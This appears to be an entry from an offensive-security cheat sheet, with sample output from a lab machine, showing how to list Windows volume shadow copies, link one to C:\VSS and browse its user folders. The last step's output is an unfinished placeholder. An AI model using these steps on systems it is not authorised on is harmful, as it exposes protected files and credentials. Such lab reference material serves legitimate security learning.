Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Recover data from shadow copies
1. Check
vssadmin list shadows
Sample Output:
PS C:\Windows\system32> vssadmin list shadows
vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Contents of shadow copy set ID: {001689e5-f1a7-40a8-8b5b-8b6371bd07ca}
Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
Shadow Copy ID: {046396e4-6312-45b7-96cd-5e5f6fb017ef}
Original Volume: (C:)\\?\Volume{21385651-0000-0000-0000-602200000000}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: dev.htb.local
Service Machine: dev.htb.local
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
2. Create symlink and expose the volume
cmd /c mklink /d C:\VSS <SHADOW_COPY_VOLUME_PATH>
Sample Output:
PS C:\Windows\system32> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
3. Access
ls C:\VSS\Users
Sample Output:
TO-DO